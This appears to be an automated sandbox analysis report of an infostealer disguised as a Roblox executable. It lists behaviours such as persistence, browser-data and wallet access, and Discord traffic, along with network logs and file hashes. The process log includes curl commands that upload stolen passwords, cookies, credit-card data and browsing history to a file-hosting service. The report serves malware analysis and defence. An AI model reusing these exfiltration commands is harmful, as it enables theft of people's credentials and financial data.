Analysis Overview
SHA256
168e7923fef080a922ec790f9e4466ca6dea631db3e77657be86e4d3f90a61e7
Threat Level: Shows suspicious behavior
The file edGt3Auy0E Roblox.exe was found to be: Shows suspicious behavior.
Malicious Activity Summary
Drops startup file
Reads user/profile data of web browsers
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Unsigned PE
Detects Pyinstaller
Enumerates processes with tasklist
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-07 18:22
Signatures
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-07 18:22
Reported
2024-04-07 18:24
Platform
win10v2004-20240226-en
Max time kernel
17s
Max time network
20s
Command Line
Signatures
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\edGt3Auy0E Roblox.exe | C:\Users\Admin\AppData\Local\Temp\edGt3Auy0E Roblox.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\edGt3Auy0E Roblox.exe
"C:\Users\Admin\AppData\Local\Temp\edGt3Auy0E Roblox.exe"
C:\Users\Admin\AppData\Local\Temp\edGt3Auy0E Roblox.exe
"C:\Users\Admin\AppData\Local\Temp\edGt3Auy0E Roblox.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store7.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store7.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store7.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store7.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store7.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store7.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store7.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store7.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store7.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store7.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store7.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store7.gofile.io/uploadFile
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 172.67.74.152:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 151.80.29.83:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | geolocation-db.com | udp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| US | 8.8.8.8:53 | store7.gofile.io | udp |
| US | 38.114.120.140:443 | store7.gofile.io | tcp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.29.80.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.102.89.159.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 38.114.120.140:443 | store7.gofile.io | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 140.120.114.38.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.97.55.23.in-addr.arpa | udp |
| US | 38.114.120.140:443 | store7.gofile.io | tcp |
| US | 38.114.120.140:443 | store7.gofile.io | tcp |
| US | 38.114.120.140:443 | store7.gofile.io | tcp |
| US | 38.114.120.140:443 | store7.gofile.io | tcp |
| US | 8.8.8.8:53 | 232.138.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.101.63.23.in-addr.arpa | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI36042\python311.dll
| MD5 | d06da79bfd21bb355dc3e20e17d3776c |
| SHA1 | 610712e77f80d2507ffe85129bfeb1ff72fa38bf |
| SHA256 | 2835e0f24fb13ef019608b13817f3acf8735fbc5f786d00501c4a151226bdff1 |
| SHA512 | e4dd839c18c95b847b813ffd0ca81823048d9b427e5dcf05f4fbe0d77b8f7c8a4bd1c67c106402cd1975bc20a8ec1406a38ad4764ab466ef03cb7eb1f431c38a |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\VCRUNTIME140.dll
| MD5 | be8dbe2dc77ebe7f88f910c61aec691a |
| SHA1 | a19f08bb2b1c1de5bb61daf9f2304531321e0e40 |
| SHA256 | 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83 |
| SHA512 | 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655 |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\base_library.zip
| MD5 | 6e706e4fa21d90109df6fce1b2595155 |
| SHA1 | 5328dd26b361d36239facff79baca1bab426de68 |
| SHA256 | ce9b9f16ce0d9abdbac3307115d91eaf279c5152336ccbe8830151b41c802998 |
| SHA512 | c7e377e2854ad5b5c3fb23593817ad6345bf8a78d842ff2a45c3be135fad6bb27b67c5b6c01b26e7c1b1b12ea0814f4f6b6a522bbfa689b89fa50d3652799b34 |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\_ctypes.pyd
| MD5 | a25cdcf630c024047a47a53728dc87cd |
| SHA1 | 8555ae488e0226a272fd7db9f9bdbb7853e61a21 |
| SHA256 | 3d43869a4507ed8ece285ae85782d83bb16328cf636170acb895c227ebb142ac |
| SHA512 | f6a4272deddc5c5c033a06e80941a16f688e28179eab3dbc4f7a9085ea4ad6998b89fc9ac501c5bf6fea87e0ba1d9f2eda819ad183b6fa7b6ddf1e91366c12af |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\python3.DLL
| MD5 | 35da4143951c5354262a28dee569b7b2 |
| SHA1 | b07cb6b28c08c012eecb9fd7d74040163cdf4e0e |
| SHA256 | 920350a7c24c46339754e38d0db34ab558e891da0b3a389d5230a0d379bee802 |
| SHA512 | 2976667732f9ee797b7049d86fd9beeb05409adb7b89e3f5b1c875c72a4076cf65c762632b7230d7f581c052fce65bb91c1614c9e3a52a738051c3bc3d167a23 |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\libffi-8.dll
| MD5 | 0f8e4992ca92baaf54cc0b43aaccce21 |
| SHA1 | c7300975df267b1d6adcbac0ac93fd7b1ab49bd2 |
| SHA256 | eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a |
| SHA512 | 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978 |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\_lzma.pyd
| MD5 | 3273720ddf2c5b75b072a1fb13476751 |
| SHA1 | 5fe0a4f98e471eb801a57b8c987f0feb1781ca8b |
| SHA256 | 663f1087c2ed664c5995a3ffa64546d2e33a0fce8a9121b48cc7c056b74a2948 |
| SHA512 | 919dbbfcc2f5913655d77f6c4ae9baa3a300153a5821dc9f23e0aceb89f69cb9fb86d6ce8f367b9301e0f7b6027e6b2f0911a2e73255ab5150a74b862f8af18e |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\select.pyd
| MD5 | e07ae2f7f28305b81adfd256716ae8c6 |
| SHA1 | 9222cd34c14a116e7b9b70a82f72fc523ef2b2f6 |
| SHA256 | fb06ac13f8b444c3f7ae5d2af15710a4e60a126c3c61a1f1e1683f05f685626c |
| SHA512 | acb143194ca465936a48366265ae3e11a2256aeae333c576c8c74f8ed9b60987daff81647aef74e236b30687a28bc7e3aa21c6aedbfa47b1501658a2bfd117b4 |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\_socket.pyd
| MD5 | 485d998a2de412206f04fa028fe6ba90 |
| SHA1 | 286e29d4f91a46171ba1e3c8229e6de94b499f1d |
| SHA256 | 8f9ede5044643413c3b072cd31a565956498ca07cdd17fb6a04483d388fdad76 |
| SHA512 | 68591522e9188f06ff81cd2b3506b40b9ad508d6e34f0111819bf5eff47ed9adf95ebfae5d05b685c4f53b186d15cc45e0d831d96be926f7a5762ee2f1341f1f |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\pywin32_system32\pywintypes311.dll
| MD5 | 90b786dc6795d8ad0870e290349b5b52 |
| SHA1 | 592c54e67cf5d2d884339e7a8d7a21e003e6482f |
| SHA256 | 89f2a5c6be1e70b3d895318fdd618506b8c0e9a63b6a1a4055dff4abdc89f18a |
| SHA512 | c6e1dbf25d260c723a26c88ec027d40d47f5e28fc9eb2dbc72a88813a1d05c7f75616b31836b68b87df45c65eef6f3eaed2a9f9767f9e2f12c45f672c2116e72 |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\win32\win32api.pyd
| MD5 | 1d6762b494dc9e60ca95f7238ae1fb14 |
| SHA1 | aa0397d96a0ed41b2f03352049dafe040d59ad5d |
| SHA256 | fae5323e2119a8f678055f4244177b5806c7b6b171b1945168f685631b913664 |
| SHA512 | 0b561f651161a34c37ff8d115f154c52202f573d049681f8cdd7bba2e966bb8203780c19ba824b4a693ef12ef1eeef6aeeef96eb369e4b6129f1deb6b26aaa00 |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\pywin32_system32\pythoncom311.dll
| MD5 | f98264f2dacfc8e299391ed1180ab493 |
| SHA1 | 849551b6d9142bf983e816fef4c05e639d2c1018 |
| SHA256 | 0fe49ec1143a0efe168809c9d48fe3e857e2ac39b19db3fd8718c56a4056696b |
| SHA512 | 6bb3dbd9f4d3e6b7bd294f3cb8b2ef4c29b9eff85c0cfd5e2d2465be909014a7b2ecd3dc06265b1b58196892bb04d3e6b0aa4b2ccbf3a716e0ff950eb28db11c |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\VCRUNTIME140_1.dll
| MD5 | f8dfa78045620cf8a732e67d1b1eb53d |
| SHA1 | ff9a604d8c99405bfdbbf4295825d3fcbc792704 |
| SHA256 | a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5 |
| SHA512 | ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371 |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\_queue.pyd
| MD5 | 284fbc1b32f0282fc968045b922a4ee2 |
| SHA1 | 7ccea7a48084f2c8463ba30ddae8af771538ae82 |
| SHA256 | ac3b144d7d7c8ee39f29d8749c5a35c4314b5365198821605c883fd11807e766 |
| SHA512 | baa75f7553cf595ad78c84cbb0f2a50917c93596ece1ff6221e64272adc6facdd8376e00918c6c3246451211d9dfc66442d31759bd52c26985c7f133cf011065 |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\pyexpat.pyd
| MD5 | d7ecc2746314fec5ca46b64c964ea93e |
| SHA1 | 39fc49d4058a65f0aa4fbdc3d3bcc8c7beecaa01 |
| SHA256 | 58b95f03a2d7ec49f5260e3e874d2b9fb76e95ecc80537e27abef0c74d03cb00 |
| SHA512 | d5a595aaf3c7603804deae4d4cc34130876a4c38ccd9f9f29d8b8b11906fa1a03dd9a1f8f5dbde9dc2c62b89fe52dfe5b4ee409a8d336edf7b5b8141d12e82d2 |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\_uuid.pyd
| MD5 | b21b864e357ccd72f35f2814bd1e6012 |
| SHA1 | 2ff0740c26137c6a81b96099c1f5209db33ac56a |
| SHA256 | ce9e2a30c20e6b83446d9ba83bb83c5570e1b1da0e87ff467d1b4fc090da6c53 |
| SHA512 | 29667eb0e070063ef28b7f8cc39225136065340ae358ad0136802770b2f48ac4bda5e60f2e2083f588859b7429b9ea3bad1596a380601e3b2b4bb74791df92a3 |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\_ssl.pyd
| MD5 | e5b1a076e9828985ea8ea07d22c6abd0 |
| SHA1 | 2a2827938a490cd847ea4e67e945deb4eef8cbb1 |
| SHA256 | 591589dadc659d1ad4856d16cd25dc8e57eaa085bf68eb2929f8f93aba69db1b |
| SHA512 | 0afd20f581efb08a7943a1984e469f1587c96252e44b3a05ca3dfb6c7b8b9d1b9fd609e03a292de6ec63b6373aeacc822e30d550b2f2d35bf7bf8dd6fc11f54f |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\_sqlite3.pyd
| MD5 | 8c9f7beeeeb75816cc0c1f8474023029 |
| SHA1 | 96a49c164bdfce7a0d90d87074e0c9b5f8077610 |
| SHA256 | d077e236b709b5242d62ce4923feddbfcc719ec26612ed474ed3b25ee290d0ac |
| SHA512 | aba229c8b843c07ea8d59ac901d06263a3eefe6824e71c4b4beb47d5071be34068f13ce13a962b0a8583c834c3dc4d045185c47fb8b2922e853fdb78bf4f6f77 |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\_overlapped.pyd
| MD5 | e2a301b3fd3bdfec3bf6ca006189b2ac |
| SHA1 | 86b29ee1a42de70135a6786cdce69987f1f61193 |
| SHA256 | 4990f62e11c0a5ab15a9ffce9d054f06d0bc9213aea0c2a414a54fa01a5eb6dc |
| SHA512 | 4e5493cc4061be923b253164fd785685d5eccf16fd3acb246b9d840f6f7d9ed53555f53725af7956157d89eaa248a3505c30bd88c26e04aabdae62e4774ffa4e |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\_multiprocessing.pyd
| MD5 | 758128e09779a4baa28e68a8b9ee2476 |
| SHA1 | 4e81c682cf18e2a4b46e50f037799c43c6075f11 |
| SHA256 | 3c5b0823e30810aee47fdfad567491bc33dd640c37e35c8600e75c5a8d05ce2a |
| SHA512 | 5096f0daacf72012a7ad08b177c366b4fe1ded3a18aebfe438820b79c7cb735350ef831a7fb7d10482eefd4c0b8a41511042bb41f4507bbc0332c52df9288088 |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\_hashlib.pyd
| MD5 | ba682dfcdd600a4bb43a51a0d696a64c |
| SHA1 | df85ad909e9641f8fcaa0f8f5622c88d904e9e20 |
| SHA256 | 2ad55e11bddb5b65cdf6e9e126d82a3b64551f7ad9d4cbf74a1058fd7e5993bd |
| SHA512 | 79c607e58881d3c3dfb83886fe7aa4cddb5221c50499d33fe21e1efb0ffa1fd0d3f52cbe97b16b04fbe2b067d6eb5997ac66dec9d2a160d3cb6d44ffca0f5636 |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\_decimal.pyd
| MD5 | e4e032221aca4033f9d730f19dc3b21a |
| SHA1 | 584a3b4bc26a323ce268a64aad90c746731f9a48 |
| SHA256 | 23bdd07b84d2dbcb077624d6dcbfc66ab13a9ef5f9eebe31dc0ffece21b9e50c |
| SHA512 | 4a350ba9e8481b66e7047c9e6c68e6729f8074a29ef803ed8452c04d6d61f8f70300d5788c4c3164b0c8fb63e7c9715236c0952c3166b606e1c7d7fff36b7c4c |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\_cffi_backend.cp311-win_amd64.pyd
| MD5 | 210def84bb2c35115a2b2ac25e3ffd8f |
| SHA1 | 0376b275c81c25d4df2be4789c875b31f106bd09 |
| SHA256 | 59767b0918859beddf28a7d66a50431411ffd940c32b3e8347e6d938b60facdf |
| SHA512 | cd5551eb7afd4645860c7edd7b0abd375ee6e1da934be21a6099879c8ee3812d57f2398cad28fbb6f75bba77471d9b32c96c7c1e9d3b4d26c7fc838745746c7f |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\_asyncio.pyd
| MD5 | 41806866d74e5edce05edc0ad47752b9 |
| SHA1 | c3d603c029fdac45bac37bb2f449fab86b8845dd |
| SHA256 | 76db93bd64cb4a36edb37694456f89bb588db98cf2733eb436f000b309eec3b2 |
| SHA512 | 2a019efaf3315b8b98be93ac4bea15cec8b9ecc6eab298fa93d3947bad2422b5a126d52cb4998363bdc82641fba9b8f42d589afe52d02914e55a5a6116989fde |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\unicodedata.pyd
| MD5 | 5cc36a5de45a2c16035ade016b4348eb |
| SHA1 | 35b159110e284b83b7065d2cff0b5ef4ccfa7bf1 |
| SHA256 | f28ac3e3ad02f9e1d8b22df15fa30b2190b080261a9adc6855248548cd870d20 |
| SHA512 | 9cccbf81e80c32976b7b2e0e3978e8f7350cce542356131b24ebab34b256efd44643d41ee4b2994b9152c2e5af302aa182a1889c99605140f47494a501ef46c1 |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\sqlite3.dll
| MD5 | 346f6150977371cdc424ec9275a9b47c |
| SHA1 | 986096738808eb6ed364c4ac5b3500b5b35bec10 |
| SHA256 | ff950af2dad140377a55da6f3c242327ced0cf498db50e028abe1ed023f19b90 |
| SHA512 | 03cb04e356a8a2d9b871d3365cab01da4220df7687be38572ae37fa833b924f8c7c5a4606b33ad717d50e5d3d8929f885f38ef5ad582a579c4ee7093f302ee9f |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\libssl-3.dll
| MD5 | 19a2aba25456181d5fb572d88ac0e73e |
| SHA1 | 656ca8cdfc9c3a6379536e2027e93408851483db |
| SHA256 | 2e9fbcd8f7fdc13a5179533239811456554f2b3aa2fb10e1b17be0df81c79006 |
| SHA512 | df17dc8a882363a6c5a1b78ba3cf448437d1118ccc4a6275cc7681551b13c1a4e0f94e30ffb94c3530b688b62bff1c03e57c2c185a7df2bf3e5737a06e114337 |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\libcrypto-3.dll
| MD5 | e547cf6d296a88f5b1c352c116df7c0c |
| SHA1 | cafa14e0367f7c13ad140fd556f10f320a039783 |
| SHA256 | 05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de |
| SHA512 | 9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\_bz2.pyd
| MD5 | 37eace4b806b32f829de08db3803b707 |
| SHA1 | 8a4e2bb2d04685856d1de95b00f3ffc6ea1e76b9 |
| SHA256 | 1be51ef2b5acbe490217aa1ff12618d24b95df6136c6844714b9ca997b4c7f9b |
| SHA512 | 1591a263de16373ee84594943a0993721b1e1a2f56140d348a646347a8e9760930df4f632adcee9c9870f9c20d7818a3a8c61b956723bf94777e0b7fb7689b2d |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\charset_normalizer\md.cp311-win_amd64.pyd
| MD5 | 723ec2e1404ae1047c3ef860b9840c29 |
| SHA1 | 8fc869b92863fb6d2758019dd01edbef2a9a100a |
| SHA256 | 790a11aa270523c2efa6021ce4f994c3c5a67e8eaaaf02074d5308420b68bd94 |
| SHA512 | 2e323ae5b816adde7aaa14398f1fdb3efe15a19df3735a604a7db6cadc22b753046eab242e0f1fbcd3310a8fbb59ff49865827d242baf21f44fd994c3ac9a878 |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\charset_normalizer\md__mypyc.cp311-win_amd64.pyd
| MD5 | 9ea8098d31adb0f9d928759bdca39819 |
| SHA1 | e309c85c1c8e6ce049eea1f39bee654b9f98d7c5 |
| SHA256 | 3d9893aa79efd13d81fcd614e9ef5fb6aad90569beeded5112de5ed5ac3cf753 |
| SHA512 | 86af770f61c94dfbf074bcc4b11932bba2511caa83c223780112bda4ffb7986270dc2649d4d3ea78614dbce6f7468c8983a34966fc3f2de53055ac6b5059a707 |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\Crypto\Cipher\_raw_ecb.pyd
| MD5 | fee13d4fb947835dbb62aca7eaff44ef |
| SHA1 | 7cc088ab68f90c563d1fe22d5e3c3f9e414efc04 |
| SHA256 | 3e0d07bbf93e0748b42b1c2550f48f0d81597486038c22548224584ae178a543 |
| SHA512 | dea92f935bc710df6866e89cc6eb5b53fc7adf0f14f3d381b89d7869590a1b0b1f98f347664f7a19c6078e7aa3eb0f773ffcb711cc4275d0ecd54030d6cf5cb2 |
C:\Users\Admin\AppData\Local\Temp\_MEI36042\Crypto\Cipher\_raw_cbc.pyd
| MD5 | 20708935fdd89b3eddeea27d4d0ea52a |
| SHA1 | 85a9fe2c7c5d97fd02b47327e431d88a1dc865f7 |
| SHA256 | 11dd1b49f70db23617e84e08e709d4a9c86759d911a24ebddfb91c414cc7f375 |
| SHA512 | f28c31b425dc38b5e9ad87b95e8071997e4a6f444608e57867016178cd0ca3e9f73a4b7f2a0a704e45f75b7dcff54490510c6bf8461f3261f676e9294506d09b |
C:\Users\Admin\AppData\Local\Tempcrhsoocggw.db
| MD5 | c9ff7748d8fcef4cf84a5501e996a641 |
| SHA1 | 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9 |
| SHA256 | 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988 |
| SHA512 | d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73 |
C:\Users\Admin\AppData\Local\Tempcrviojqgvg.db
| MD5 | 90a1d4b55edf36fa8b4cc6974ed7d4c4 |
| SHA1 | aba1b8d0e05421e7df5982899f626211c3c4b5c1 |
| SHA256 | 7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c |
| SHA512 | ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2 |
C:\Users\Admin\AppData\Local\Tempcroxfhpkit.db
| MD5 | c2515561b9dd345db98ed9d4fc658338 |
| SHA1 | f403e9444049165bd5f3e3176d76a39eeaebf211 |
| SHA256 | 38f56b30db83047d4568ca521650ee4bcfc8a19ef972735f9dd53ebfa17881cf |
| SHA512 | 3cfd530e47ef80e73d8b92501e54ef66b961eaafbc379d013b20a71701abe5bea0caab9bd932a8769fdb2e15ac70320df9025f75ad4adc83bec8790ee96ffaa4 |
C:\Users\Admin\AppData\Local\Tempcregqvescn.db
| MD5 | 02d2c46697e3714e49f46b680b9a6b83 |
| SHA1 | 84f98b56d49f01e9b6b76a4e21accf64fd319140 |
| SHA256 | 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9 |
| SHA512 | 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac |
C:\Users\Admin\AppData\Local\Tempcrccliycfo.db
| MD5 | f70aa3fa04f0536280f872ad17973c3d |
| SHA1 | 50a7b889329a92de1b272d0ecf5fce87395d3123 |
| SHA256 | 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8 |
| SHA512 | 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84 |
C:\Users\Admin\AppData\Local\Tempcrmweckyxj.db
| MD5 | 349e6eb110e34a08924d92f6b334801d |
| SHA1 | bdfb289daff51890cc71697b6322aa4b35ec9169 |
| SHA256 | c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a |
| SHA512 | 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-07 18:22
Reported
2024-04-07 18:24
Platform
win7-20240221-en
Max time kernel
2s
Max time network
22s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\edGt3Auy0E Roblox.exe
"C:\Users\Admin\AppData\Local\Temp\edGt3Auy0E Roblox.exe"